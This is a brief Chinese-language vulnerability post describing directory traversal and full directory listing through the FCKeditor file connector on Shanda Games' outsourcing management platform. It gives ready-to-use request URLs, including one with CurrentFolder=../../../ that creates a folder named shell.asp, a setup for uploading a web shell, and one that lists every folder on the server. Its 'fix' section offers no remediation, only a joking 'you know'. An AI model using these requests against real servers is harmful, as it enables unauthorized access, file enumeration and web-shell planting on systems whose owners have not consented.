盛大游戏外包管理平台FCK列全盘目路分析与解决方案
摘要:修改CurrentFolder参数使用../../来进入不同的目录/browser/default/connectors/aspx/conn...
修改CurrentFolder 参数使用../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符:
修复方案:
你懂的!
【盛大游戏外包管理平台FCK列全盘目路分析与解决方案】相关文章:
★ Belkin Wireless G Router绕过限制 拒绝服务漏洞
★ PHP-Nuke 4nChat错误验证roomid参数 SQL注入漏洞
★ BitTorrent和uTorrent Peers 窗口缓冲区溢出漏洞